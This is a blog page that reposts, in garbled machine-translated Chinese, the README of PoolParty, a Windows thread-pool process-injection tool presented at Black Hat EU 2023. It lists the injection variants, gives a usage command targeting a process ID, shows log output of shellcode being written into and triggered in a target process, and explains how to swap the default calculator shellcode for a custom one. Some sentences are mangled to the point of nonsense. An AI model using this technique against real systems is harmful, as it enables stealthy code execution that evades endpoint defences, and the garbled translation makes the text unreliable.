Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86368947

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

滥用Windows线程池的完全无法选择的过程注入技术的集合。在Black Hat Eu eu 2023标题下以标题下的简报- 注射技术- 使用Windows-thread-pools-35446'The Pool party您将永远不会忘记3:使用窗口线程池3

PoolParty变体

3:新的过程注入技术

用法

目标过程中的项目池4将tp_io工作项目插入目标过程的线程池5将tp_alpc工作项目插入目标过程的线程池6插入tp_job工作项目到目标过程的线程池7插入tp_direct tp_direct tp_direct工作项目到目标过程的线程池的线程池8插入TP_TIMER工作项目8目标PID

用法示例

插入tp_timer工作项要处理ID 1234

poolParty.exe -v 8 -p 1234

[INFO]启动PoolParty攻击进程ID: 1234

[INFO]检索到目标过程: 000000000000000000B8

[INFO]目标过程劫持工厂手柄: 0000000000000000000058

[INFO]目标过程中劫持的计时器队列句柄: 000000000000000000054

[INFO]目标进程中分配的外壳内存: 00000281DBEF0000

[信息]书面壳代码到目标过程

[信息]检索目标工厂的基本信息

[INFO]创建了与ShellCode关联的TP_TIMER结构

[信息]目标进程中分配的TP_TIMER内存: 00000281DBF00000

[INFO]将特殊精心制作的TP_Timer结构写成目标过程

[INFO]修改了目标过程的TP_POOL TIEMR队列列表条目,指向特殊精心设计的TP_Timer

[INFO]设置计时器队列到期以触发Dequeueing tpptimerqueueexp Iration

[INFO] POOLPARTY攻击成功完成了

默认的shellCode和自定义

默认的ShellCode通过Winexec API产生了计算器。

要自定义执行执行的执行,请在main.cpp文件中存在的g_shellcode变量末端更改路径。

作者 - Alon Leviev

LinkedIn -Alon Leviev Twitter- @_0xdeku